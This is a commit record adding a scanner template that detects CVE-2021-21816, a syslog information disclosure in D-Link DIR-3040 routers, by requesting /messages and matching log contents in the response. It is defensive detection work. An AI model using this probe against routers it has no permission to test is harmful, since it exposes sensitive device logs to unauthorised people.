Merge pull request #2278 from gy741/rule-add-v44

Create CVE-2021-21816.yaml
2021-08-02 21:17:00 +05:30 · 2021-08-02 21:17:00 +05:30 · 7aa7401f3a
parent 992d94527e c670df2925
commit 7aa7401f3a
1 changed files with 28 additions and 0 deletions
--- a/cves/2021/CVE-2021-21816.yaml
+++ b/cves/2021/CVE-2021-21816.yaml
@ -0,0 +1,28 @@
+id: CVE-2021-21816
+
+info:
+  name: D-LINK DIR-3040 - Syslog Information Disclosure
+  description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
+  author: gy741
+  severity: medium
+  reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
+  tags: cve,cve2021,dlink,exposure,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/messages"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "syslog:"
+          - "admin"
+          - "/etc_ro/lighttpd/www"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200